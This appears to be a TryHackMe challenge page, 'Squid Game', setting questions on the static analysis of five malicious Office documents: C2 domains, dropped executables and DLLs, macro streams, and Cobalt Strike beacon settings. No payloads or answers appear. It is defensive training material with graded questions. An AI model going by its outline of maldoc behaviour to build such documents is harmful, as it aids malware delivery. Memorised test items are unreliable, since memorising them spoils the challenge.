Room Banner

Squid Game

오징어 게임

hard

130 min

Room progress ( 0% )

To access material, start machines and answer questions login.

Task 1Scenario

Invitation Received

You have an invitation to play a Squid Game.


In this game, you will have to play the defensive role and eliminate five attackers. Let us tell you before the game starts; this is not going to be easy. Less hints are provided in this room to challenge you. You won't believe it, but sometimes the best way to learn is to do your own research and come up with your own approach to solve the challenges. You will have all the necessary tools needed in the Virtual Machine to complete the challenge.

We look forward to your writeups! 

What is the prize for the winner? 


You will get the credits for being awesome and also take away a bunch of knowledge. 

And, on the final note, let the game begin!


Deploy the machine attached to this task; it will be visible in the split-screen view once it is ready.

If you don't see a virtual machine load then click the Show Split View button.


Answer the questions below
Accept the invitation? (Yes/No)


Attacker 1 will give you a warm-up before the hardest yet to come challenge... Try to push Attacker 1 outside the lines.

Good Luck! 

Answer the questions below
What is the malicious C2 domain you found in the maldoc where an executable download was attempted?

What executable file is the maldoc trying to drop?

In what folder is it dropping the malicious executable? (hint: %Folder%)

Provide the name of the COM object the maldoc is trying to access.

Include the malicious IP and the php extension found in the maldoc. (Format: IP/name.php)

Find the phone number in the maldoc. (Answer format: xxx-xxx-xxxx)

Doing some static analysis, provide the type of maldoc this is under the keyword “AutoOpen”.

Provide the subject for this maldoc. (make sure to remove the extra whitespace)

Provide the time when this document was last saved. (Format: YEAR-MONTH-DAY XX:XX:XX)

Provide the stream number that contains a macro.

Provide the name of the stream that contains a macro.


Uh oh! Looks like you have got the next opponent - Attacker 2! 

Ready for the challenge?

Answer the questions below
Provide the streams (numbers) that contain macros.

Provide the size (bytes) of the compiled code for the second stream that contains a macro.

Provide the largest number of bytes found while analyzing the streams.

Find the command located in the ‘fun’ field ( make sure to reverse the string).

Provide the first domain found in the maldoc.

Provide the second domain found in the maldoc.

Provide the name of the first malicious DLL it retrieves from the C2 server.

How many DLLs does the maldoc retrieve from the domains?

Provide the path of where the malicious DLLs are getting dropped onto?

What program is it using to run DLLs?

How many seconds does the function in the maldoc sleep for to fully execute the malicious DLLs?

Under what stream did the main malicious script use to retrieve DLLs from the C2 domains? (Provide the name of the stream).


Looks like Attacker 3 is trying to dominate a home base. Find his weaknesses and eliminate him. 

Answer the questions below
Provide the executable name being downloaded.

What program is used to run the executable?

Provide the malicious URI included in the maldoc that was used to download the binary (without http/https).

What folder does the binary gets dropped in?

Which stream executes the binary that was downloaded?


You are very close to the finish line, but the Attacker 4 is still standing in your way. Don't let him win!

Answer the questions below
Provide the first decoded string found in this maldoc.

Provide the name of the binary being dropped.

Provide the folder where the binary is being dropped to.

Provide the name of the second binary.

Provide the full URI from which the second binary was downloaded (exclude http/https).


Congratulations, my friend! You have made it to the final stage. Remember to use your brain, not your fists, to defeat Attacker 5.


You can do it! 

Answer the questions below
What is the caption you found in the maldoc?

What is the XOR decimal value found in the decoded-base64 script?

Provide the C2 IP address of the Cobalt Strike server. 

Provide the full user-agent found.

Provide the path value for the Cobalt Strike shellcode.

Provide the port number of the Cobalt Strike C2 Server.

Provide the first two APIs found.

Created by

Room Type

Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!

Users in Room

4,298

Created

1367 days ago

Ready to learn Cyber Security? Create your free account today!

TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.

Already have an account? Log in

We use cookies to ensure you get the best user experience. For more information contact us.

Read more